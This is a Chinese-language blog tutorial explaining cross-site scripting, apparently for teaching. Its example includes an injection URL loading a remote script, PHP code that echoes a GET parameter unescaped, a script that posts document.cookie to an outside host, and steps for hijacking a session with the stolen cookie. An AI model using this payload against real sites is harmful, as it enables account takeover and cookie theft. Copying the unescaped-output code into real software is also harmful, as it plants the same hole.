XSS攻击原理以及案例说明

  • 内容
  • 评论
  • 相关

1.什么是xss攻击?

XSS攻击的全称是跨站脚本攻击,是Web应用程序中最常见到的攻击手段。跨站脚本攻击指的是攻击者在网页中嵌入恶意脚本程序,当用户打开该网页时,脚本程序便开始在客户端的浏览器上运行,便于获取cookie,用户名密码。

2.案例 (以下通过模拟说明,切勿用于非法用途否则后果自负)

通过xss攻击获取客户的cookie,并且直接登录他的账号。

首先通过get传参数注入js脚本例如

http://link.wlphp.com/?xss=%3Cscript%20src=%22https://www.wlphp.com/test/xss.js%22%3E%3C/script%3E

1.png

然后恰巧网站的业务代码里面有输出这个参数值到html里面的部分,比如如下代码。

<?php  @isset($_GET['xss'])?$_SESSION['xss']=$_GET['xss']:"" ?>
<?php echo $_SESSION['xss']; ?>

查看源代码如下:

2.png

这样查看网页源代码的时候就会发现里面有一段script标签,黑客嵌入一个远程的自己的js,自己的js内容如下


	  var cookie=document.cookie;
	  $.post("http://appwarn.wlphp.com/api.php?str="+cookie,{},function (data){
		  console.log(data);
		  
	  });



然后js里面获取客户的cookie然后通过ajax传走到自己的服务器。

4.png

黑客通过接受到的cookie就能登录他的账号了。

可以使用火狐浏览器更改phpsessionid对应的值即可

5.png




本文标签:

版权声明:若无特殊注明,本文皆为《菜鸟站长》原创,转载请保留文章出处。

本文链接:XSS攻击原理以及案例说明 - https://www.wlphp.com/?post=224

发表评论

电子邮件地址不会被公开。 必填项已用*标注